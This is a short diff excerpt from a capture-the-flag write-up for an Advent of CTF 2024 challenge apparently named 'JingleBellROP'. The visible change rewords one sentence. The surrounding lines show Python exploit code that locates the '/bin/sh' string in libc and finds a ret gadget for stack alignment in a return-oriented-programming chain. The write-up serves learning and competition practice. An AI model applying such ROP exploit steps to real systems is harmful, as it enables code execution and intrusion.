raul-dunca/CyberStudents-advent-of-ctf2024/Day16/JingleBellROP.md

 bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

 ```

-Finally we craft the exploit in a similar manner as for the first step, with the only difference being the addition of a ret gadget, which is used for stack alignment.
+Finally, I crafted the exploit in a similar manner as for the first step, with the only difference being the addition of a ret gadget, which is used for stack alignment.

 ```python
 ret = rop.find_gadget(['ret'])[0]